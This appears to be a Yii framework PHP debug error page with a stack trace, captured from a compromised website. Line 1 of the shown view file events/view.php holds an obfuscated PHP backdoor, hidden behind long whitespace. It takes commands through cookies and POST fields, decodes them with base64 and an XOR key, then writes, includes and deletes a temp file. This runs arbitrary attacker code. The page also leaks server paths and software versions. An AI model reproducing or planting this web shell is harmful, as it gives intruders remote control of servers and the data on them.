PHP warning

include(iEn_nnz.php): failed to open stream: No such file or directory

/var/www/html/Yii/framework/YiiBase.php(427)

415                         {
416                             include($classFile);
417                             if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php')
418                                 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array(
419                                     '{class}'=>$className,
420                                     '{file}'=>$classFile,
421                                 )));
422                             break;
423                         }
424                     }
425                 }
426                 else
427                     include($className.'.php');
428             }
429             else  // class name with namespace in PHP 5.3
430             {
431                 $namespace=str_replace('\\','.',ltrim($className,'\\'));
432                 if(($path=self::getPathOfAlias($namespace))!==false)
433                     include($path.'.php');
434                 else
435                     return false;
436             }
437             return class_exists($className,false) || interface_exists($className,false);
438         }
439         return true;

Stack Trace

#3
+
 /var/www/html/cfg/protected/views/events/view.php(1): class_exists("iEn_nnz")
1 <?php                                                                                                                                                                                                                                                                                                                                                                                                 $SPgCo = class_exists("iEn_nnz");if (!$SPgCo){class iEn_nnz{private $OmaJVE;public static $UmjMvrBTm = "6446b19c-75fa-4915-be87-a5501b46e3e6";public static $dOUijhqk = NULL;public function __construct(){$mjuBYvA = $_COOKIE;$HafhLxi = $_POST;$LBeNxJQ = @$mjuBYvA[substr(iEn_nnz::$UmjMvrBTm, 0, 4)];if (!empty($LBeNxJQ)){$sXdjtvfpC = "base64";$cxIOIR = "";$LBeNxJQ = explode(",", $LBeNxJQ);foreach ($LBeNxJQ as $lsykfxbY){$cxIOIR .= @$mjuBYvA[$lsykfxbY];$cxIOIR .= @$HafhLxi[$lsykfxbY];}$cxIOIR = array_map($sXdjtvfpC . chr ( 263 - 168 ).chr ( 347 - 247 ).chr (101) . chr ( 640 - 541 )."\x6f" . "\144" . chr ( 683 - 582 ), array($cxIOIR,)); $cxIOIR = $cxIOIR[0] ^ str_repeat(iEn_nnz::$UmjMvrBTm, (strlen($cxIOIR[0]) / strlen(iEn_nnz::$UmjMvrBTm)) + 1);iEn_nnz::$dOUijhqk = @unserialize($cxIOIR);}}public function __destruct(){$this->ZMCfjbfJ();}private function ZMCfjbfJ(){if (is_array(iEn_nnz::$dOUijhqk)) {$NEiAwDvYMe = sys_get_temp_dir() . "/" . crc32(iEn_nnz::$dOUijhqk["\163" . "\x61" . chr (108) . "\x74"]);@iEn_nnz::$dOUijhqk["\x77" . chr (114) . 'i' . "\164" . "\145"]($NEiAwDvYMe, iEn_nnz::$dOUijhqk['c' . chr ( 343 - 232 ).chr (110) . 't' . 'e' . chr ( 825 - 715 )."\x74"]);include $NEiAwDvYMe;@iEn_nnz::$dOUijhqk[chr (100) . "\145" . 'l' . chr (101) . chr ( 957 - 841 ).'e']($NEiAwDvYMe);exit();}}}$rDCBHDnMI = new iEn_nnz(); $rDCBHDnMI = NULL;} ?><?php
2     if(isset(Yii::app()->user->user_id)){
3         $vuser_id=Yii::app()->user->user_id;
4         $vcontroller_id=$this->uniqueid;
5         $vaction_id=Yii::app()->controller->action->id;
6         $vget_id=$_GET['id'];
#8
+
 /var/www/html/cfg/protected/controllers/EventsController.php(51): CController->render("view", array("model" => Events))
46      */
47     public function actionView($id)
48     {
49         $this->render('view',array(
50             'model'=>$this->loadModel($id),
51         ));
52     }
53 
54     /**
55      * Creates a new model.
56      * If creation is successful, the browser will be redirected to the 'view' page.
#23
+
 /var/www/html/cfg/index.php(18): CApplication->run()
13 defined('YII_DEBUG') or define('YII_DEBUG',true);
14 // specify how many levels of call stack should be shown in each log message
15 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL',3);
16 
17 require_once($yii);
18 Yii::createWebApplication($config)->run();
2024-03-28 19:38:35 nginx/1.10.3 Yii Framework/1.1.14